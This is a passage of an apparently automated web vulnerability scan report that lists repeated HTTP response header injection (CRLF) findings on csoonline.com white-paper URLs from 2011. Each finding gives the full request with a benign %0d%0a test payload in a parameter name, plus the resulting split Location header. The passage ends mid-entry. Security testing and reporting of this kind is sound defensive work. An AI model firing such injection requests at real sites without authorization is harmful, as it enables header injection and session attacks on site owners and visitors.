
2.26. http://www.csoonline.com/white-paper/647169/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647169/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 60aa5%0d%0ac0969c08704 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647169/?60aa5%0d%0ac0969c08704=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:17 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647169/data-loss-risks-during-downsizing?60aa5
c0969c08704
=1
Content-Length: 136
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647169/data-loss-risks-during-downsizing?60aa5
c0969c08704=1">here</a>

2.27. http://www.csoonline.com/white-paper/647170/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647170/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b1475%0d%0a3c8012e4482 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647170/?b1475%0d%0a3c8012e4482=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:36:15 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647170/machine-learning-sets-new-standard-for-dlp?b1475
3c8012e4482
=1
Content-Length: 145
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:55 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647170/machine-learning-sets-new-standard-for-dlp?b1475
3c8012e4482=1">here</a>

2.28. http://www.csoonline.com/white-paper/647442/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/647442/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5d62d%0d%0a017e807ca48 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/647442/?5d62d%0d%0a017e807ca48=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:59 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/647442/log-management-in-a-cyberworld?5d62d
017e807ca48
=1
Content-Length: 133
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:40 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/647442/log-management-in-a-cyberworld?5d62d
017e807ca48=1">here</a>

2.29. http://www.csoonline.com/white-paper/660813/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/660813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ae70b%0d%0a3cb69267c07 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660813/?ae70b%0d%0a3cb69267c07=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:52 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660813/data-recovery-solution-data-security-problem?ae70b
3cb69267c07
=1
Content-Length: 147
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:33 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660813/data-recovery-solution-data-security-problem?ae70b
3cb69267c07=1">here</a>

2.30. http://www.csoonline.com/white-paper/660814/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/660814/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b1583%0d%0ab9f8cde5b37 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660814/?b1583%0d%0ab9f8cde5b37=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:54 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660814/security-of-data-recovery-operations?b1583
b9f8cde5b37
=1
Content-Length: 139
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:35 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660814/security-of-data-recovery-operations?b1583
b9f8cde5b37=1">here</a>

2.31. http://www.csoonline.com/white-paper/660815/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/660815/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 55825%0d%0ae2c1cf498b2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660815/?55825%0d%0ae2c1cf498b2=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:55 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660815/closing-an-overlooked-vulnerability?55825
e2c1cf498b2
=1
Content-Length: 138
Keep-Alive: timeout=5, max=11
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:36 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660815/closing-an-overlooked-vulnerability?55825
e2c1cf498b2=1">here</a>

2.32. http://www.csoonline.com/white-paper/660816/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/660816/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f9e10%0d%0ab28c22dbeb9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660816/?f9e10%0d%0ab28c22dbeb9=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:55 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660816/checklist-for-vetting-third-party-data-recovery-service-providers?f9e10
b28c22dbeb9
=1
Content-Length: 168
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:35 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660816/checklist-for-vetting-third-party-data-recovery-service-providers?f9e10
b28c22dbeb9=1">here</a>

2.33. http://www.csoonline.com/white-paper/660817/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/660817/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 6440f%0d%0a33b5bc40b94 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/660817/?6440f%0d%0a33b5bc40b94=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:56 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/660817/what-nist-recommends-before-using-a-third-party-data-recovery-vendor?6440f
33b5bc40b94
=1
Content-Length: 171
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:36 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/660817/what-nist-recommends-before-using-a-third-party-data-recovery-vendor?6440f
33b5bc40b94=1">here</a>

2.34. http://www.csoonline.com/white-paper/661715/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/661715/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d3f6e%0d%0a276d482ea21 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661715/?d3f6e%0d%0a276d482ea21=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:51 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661715/protect-critical-assets-with-virtual-patching?d3f6e
276d482ea21
=1
Content-Length: 148
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:32 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661715/protect-critical-assets-with-virtual-patching?d3f6e
276d482ea21=1">here</a>

2.35. http://www.csoonline.com/white-paper/661716/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/661716/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 47126%0d%0aa7aabbbb7c8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661716/?47126%0d%0aa7aabbbb7c8=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:52 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661716/an-rfp-checklist-for-next-gen-network-security?47126
a7aabbbb7c8
=1
Content-Length: 149
Keep-Alive: timeout=5, max=6
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:32 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661716/an-rfp-checklist-for-next-gen-network-security?47126
a7aabbbb7c8=1">here</a>

2.36. http://www.csoonline.com/white-paper/661717/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/661717/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 161dc%0d%0a29ef911a11d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661717/?161dc%0d%0a29ef911a11d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:53 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661717/firewalls-exposed?161dc
29ef911a11d
=1
Content-Length: 120
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:33 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661717/firewalls-exposed?161dc
29ef911a11d=1">here</a>

2.37. http://www.csoonline.com/white-paper/661813/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/661813/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a3ded%0d%0abf172a714b5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661813/?a3ded%0d%0abf172a714b5=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:51 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661813/gartner-magic-quadrant-for-network-ips?a3ded
bf172a714b5
=1
Content-Length: 141
Keep-Alive: timeout=5, max=52
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661813/gartner-magic-quadrant-for-network-ips?a3ded
bf172a714b5=1">here</a>

2.38. http://www.csoonline.com/white-paper/661814/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/661814/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 96028%0d%0a0eee729cd30 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/661814/?96028%0d%0a0eee729cd30=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/661814/nss-labs-network-ips-report-for-mcafee?96028
0eee729cd30
=1
Content-Length: 141
Keep-Alive: timeout=5, max=62
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/661814/nss-labs-network-ips-report-for-mcafee?96028
0eee729cd30=1">here</a>

2.39. http://www.csoonline.com/white-paper/662566/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/662566/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload da36e%0d%0aed7f5cd666d was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662566/?da36e%0d%0aed7f5cd666d=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:50 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662566/the-state-of-internet-vulnerability?da36e
ed7f5cd666d
=1
Content-Length: 138
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:31 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662566/the-state-of-internet-vulnerability?da36e
ed7f5cd666d=1">here</a>

2.40. http://www.csoonline.com/white-paper/662571/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/662571/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4bb3d%0d%0ac27e7cb52b1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662571/?4bb3d%0d%0ac27e7cb52b1=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:48 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662571/dnssec-what-it-is-and-isn-t?4bb3d
c27e7cb52b1
=1
Content-Length: 130
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:29 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662571/dnssec-what-it-is-and-isn-t?4bb3d
c27e7cb52b1=1">here</a>

2.41. http://www.csoonline.com/white-paper/662587/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/662587/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4fa79%0d%0a6bd39cacd16 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/662587/?4fa79%0d%0a6bd39cacd16=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

